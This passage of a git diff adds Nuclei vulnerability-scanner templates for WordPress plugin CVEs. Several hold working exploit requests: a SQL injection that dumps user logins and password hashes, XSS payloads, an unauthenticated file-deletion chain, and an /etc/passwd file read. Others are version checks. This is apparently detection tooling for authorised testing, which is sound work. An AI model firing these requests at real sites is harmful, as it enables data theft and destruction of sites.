    • " + condition: and + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/09 diff --git a/poc/cve/CVE-2019-10692(1).yaml b/poc/cve/CVE-2019-10692(1).yaml new file mode 100644 index 0000000000..a15f0cd07d --- /dev/null +++ b/poc/cve/CVE-2019-10692(1).yaml @@ -0,0 +1,57 @@ +id: CVE-2019-10692 + +info: + name: WordPress Google Maps <7.11.18 - SQL Injection + author: pussycat0x + severity: critical + description: | + WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. + remediation: | + Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). + reference: + - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://wordpress.org/plugins/wp-google-maps/#developers + - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-10692 + cwe-id: CWE-89 + epss-score: 0.9737 + epss-percentile: 0.99889 + cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: codecabin + product: wp_go_maps + framework: wordpress + tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin + +http: + - method: GET + path: + - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"user_login"' + - '"user_pass"' + - '"user_nicename"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 +# digest: 4a0a00473045022100c806b890a97e99051ab9b8870e02ada13436f59da4752594ce9b67a1128d22d40220703e18d56fabf954d54d723644533979ffb22a19e26d64263430140e7f069c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-15713-3886.yaml b/poc/cve/CVE-2019-15713-3886.yaml new file mode 100644 index 0000000000..72094546ac --- /dev/null +++ b/poc/cve/CVE-2019-15713-3886.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-15713 +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo,dhiyaneshDk + severity: medium + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-24312-4805.yaml b/poc/cve/CVE-2020-24312-4805.yaml new file mode 100644 index 0000000000..8857313069 --- /dev/null +++ b/poc/cve/CVE-2020-24312-4805.yaml @@ -0,0 +1,24 @@ +id: cve-2020-24312 + +info: + name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure + author: x1m_martijn + severity: high + + # NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312 + # Source: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + # Note: Manually check content + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Index of' \ No newline at end of file diff --git a/poc/cve/CVE-2020-24312-4806.yaml b/poc/cve/CVE-2020-24312-4806.yaml new file mode 100644 index 0000000000..0c6a124ffa --- /dev/null +++ b/poc/cve/CVE-2020-24312-4806.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-24312 + +info: + name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure + author: x1m_martijn + severity: high + description: | + mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + reference: + - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-24312 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 + tags: cve,cve2020,wordpress,backups,plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Index of' + - 'wp-content/uploads/wp-file-manager-pro/fm_backup' + - 'backup_' + condition: and + +# Enhanced by mp on 2022/04/08 diff --git a/poc/cve/CVE-2020-35951-5106.yaml b/poc/cve/CVE-2020-35951-5106.yaml new file mode 100644 index 0000000000..0ab49a2bc9 --- /dev/null +++ b/poc/cve/CVE-2020-35951-5106.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-35951 + +info: + name: Wordpress Quiz and Survey Master Arbitrary File Deletion + author: princechaddha + severity: critical + description: | + An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ + tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 + +requests: + - raw: + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 + + + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="action" + + qsm_remove_file_fd_question + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="file_url" + + {{fullpath}}wp-content/plugins/quiz-master-next/README.md + ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- + + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: fullpath + internal: true + part: body + group: 1 + regex: + - "not found in ([/a-z_]+)wp" + + req-condition: true + matchers-condition: and + matchers: + + - type: word + words: + - '{"type":"success","message":"File removed successfully"}' + part: body + + - type: dsl + dsl: + - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" \ No newline at end of file diff --git a/poc/cve/CVE-2021-24495-5749.yaml b/poc/cve/CVE-2021-24495-5749.yaml new file mode 100644 index 0000000000..7851a3c8fc --- /dev/null +++ b/poc/cve/CVE-2021-24495-5749.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-24495 + +info: + name: Wordpress Plugin Marmoset Viewer XSS + author: johnjhacking + severity: medium + description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue. + reference: + - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ + - https://wordpress.org/plugins/marmoset-viewer/#developers + - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 + tags: cve,cve2021,wp-plugin,wordpress,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "alert(/{{randstr}}/)" + part: body + condition: or + + - type: word + words: + - "Marmoset Viewer" diff --git a/poc/cve/CVE-2021-24838-5768.yaml b/poc/cve/CVE-2021-24838-5768.yaml new file mode 100644 index 0000000000..330119c99b --- /dev/null +++ b/poc/cve/CVE-2021-24838-5768.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24838 + +info: + name: AnyComment <= 0.2.21 - Open Redirect + author: noobexploiter + severity: medium + description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature. + reference: + - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 + tags: wordpress,wp-plugin,open-redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24838 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 302 diff --git a/poc/cve/CVE-2021-24947-5775.yaml b/poc/cve/CVE-2021-24947-5775.yaml new file mode 100644 index 0000000000..216a1e0d5a --- /dev/null +++ b/poc/cve/CVE-2021-24947-5775.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-24947 + +info: + name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read + author: cckuailong + severity: high + description: "WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server." + reference: + - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 + classification: + cve-id: CVE-2021-24947 + cwe-id: CWE-23 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/CVE-2021-24991-5779.yaml b/poc/cve/CVE-2021-24991-5779.yaml new file mode 100644 index 0000000000..0776823a12 --- /dev/null +++ b/poc/cve/CVE-2021-24991-5779.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-24991 + +info: + name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting + author: cckuailong + severity: medium + description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + reference: + - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2021-24991 + cwe-id: CWE-79 + cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:*:*:* + epss-score: 0.00092 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan + metadata: + max-request: 2 + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" + - "WooCommerce PDF Invoices" + condition: and + + - type: status + status: + - 200 + +# Enhanced by cs 08/16/2022 diff --git a/poc/cve/CVE-2021-25074-5799.yaml b/poc/cve/CVE-2021-25074-5799.yaml new file mode 100644 index 0000000000..a813eb2c79 --- /dev/null +++ b/poc/cve/CVE-2021-25074-5799.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-25074 + +info: + name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect + author: 0x_Akoko + severity: medium + description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue + reference: + - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 + - https://www.cvedetails.com/cve/CVE-2021-25074 + tags: cve,cve2021,redirect,webp,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-25074 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/CVE-2021-39322-6337.yaml b/poc/cve/CVE-2021-39322-6337.yaml new file mode 100644 index 0000000000..80b3ada7a5 --- /dev/null +++ b/poc/cve/CVE-2021-39322-6337.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-39322 + +info: + name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2021-39350-6343.yaml b/poc/cve/CVE-2021-39350-6343.yaml new file mode 100644 index 0000000000..330eb99f1e --- /dev/null +++ b/poc/cve/CVE-2021-39350-6343.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-39350 + +info: + name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected Cross-Site Scripting + author: gy741 + severity: medium + description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + reference: + - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 + - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39350 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "

    FV Player Stats

    " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2022-0271-6617.yaml b/poc/cve/CVE-2022-0271-6617.yaml new file mode 100644 index 0000000000..44ceba55fb --- /dev/null +++ b/poc/cve/CVE-2022-0271-6617.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0271 + +info: + name: LearnPress < 4.1.6 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 + tags: xss,wp,wp-plugin,wordpress,cve,cve2022,learnpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2022-0271 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"dismissed":"xxx"}' + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-0288(1).yaml b/poc/cve/CVE-2022-0288(1).yaml new file mode 100644 index 0000000000..6fe7c560eb --- /dev/null +++ b/poc/cve/CVE-2022-0288(1).yaml @@ -0,0 +1,60 @@ +id: CVE-2022-0288 + +info: + name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0288 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: ad_inserter_pro_project + product: ad_inserter_pro + framework: wordpress + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project + +http: + - method: POST + path: + - "{{BaseURL}}" + + body: | + html_element_selection= + + headers: + Content-Type: "application/x-www-form-urlencoded" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a1ca7cd22a56a330f431df7aac1d8932a96f61707e94e4cec22162652d6e4fb3022073e6e623e1d660731778b65b288a3bf36e832dd59d8e3eb8377199e6f4915093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml b/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml new file mode 100644 index 0000000000..029856609e --- /dev/null +++ b/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.2 - Missing Authorization on REST-API + author: topscoder + severity: high + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the /wp-json/vcita-wordpress/v1/actions/auth REST-API endpoint in versions up to, and including, 4.4.2 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4855627a-de56-49ee-b0b0-01b9735d8557?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-2299 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2023-2299' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml b/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml new file mode 100644 index 0000000000..63e3b01e3f --- /dev/null +++ b/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6 + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.6 - Missing Authorization to Settings Update and Arbitrary File Upload + author: topscoder + severity: low + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_settings_callback function in versions up to, and including, 4.4.6. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to modify the plugins settings, upload arbitrary files, and inject malicious JavaScript (before 4.3.2). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2023-2414 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2023-2414' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file diff --git a/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml b/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml new file mode 100644 index 0000000000..34870a3229 --- /dev/null +++ b/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-7297-a95d63f970ebd421a8709918222db375 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The TwitterPosts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2023-7297 + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:CVE-2023-7297' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml b/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml new file mode 100644 index 0000000000..535f3d43ce --- /dev/null +++ b/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed + +info: + name: > + WP AdCenter – Ad Manager & Adsense Ads <= 2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpadcenter_ad Shortcode + author: topscoder + severity: low + description: > + The WP AdCenter – Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpadcenter_ad shortcode in all versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0597a63d-2627-477f-874a-c35b6df7afd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10113 + metadata: + fofa-query: "wp-content/plugins/wpadcenter/" + google-query: inurl:"/wp-content/plugins/wpadcenter/" + shodan-query: 'vuln:CVE-2024-10113' + tags: cve,wordpress,wp-plugin,wpadcenter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpadcenter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: 